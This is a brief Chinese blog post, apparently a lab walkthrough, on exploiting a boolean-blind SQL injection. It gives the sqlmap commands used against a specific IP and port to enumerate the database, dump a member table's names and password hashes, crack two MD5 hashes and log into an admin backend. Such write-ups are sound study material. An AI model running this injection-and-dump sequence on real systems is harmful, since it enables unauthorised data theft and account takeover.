SQL注入漏洞测试(布尔盲注)

2020年4月9日 • 技术就是背锅侠 • 0条评论 •

渗透测试

打开页面发现一个登录框。还有一个通知。

直接扔sqlmap里面跑

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1

然后开始爆裤

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 --dbs

接下来就是报表/字段/数据

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup --tables

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member -C name,password --dump

然后解码md5

3114b433dece9180717f2b7de56b28a3解(528469)

870a77a3bdc1ff88e85cdcc250d78857解(402315)

登录后台发现第一个被禁用，第二个登录成功

大概就这些。

声明: 本文采用 BY-NC-SA 协议进行授权，如无注明均为原创，转载请注明转自运维那些事
本文地址: SQL注入漏洞测试(布尔盲注)

SQL注入

好耶,沙发还空着ヾ(≧▽≦*)o

当前评论页：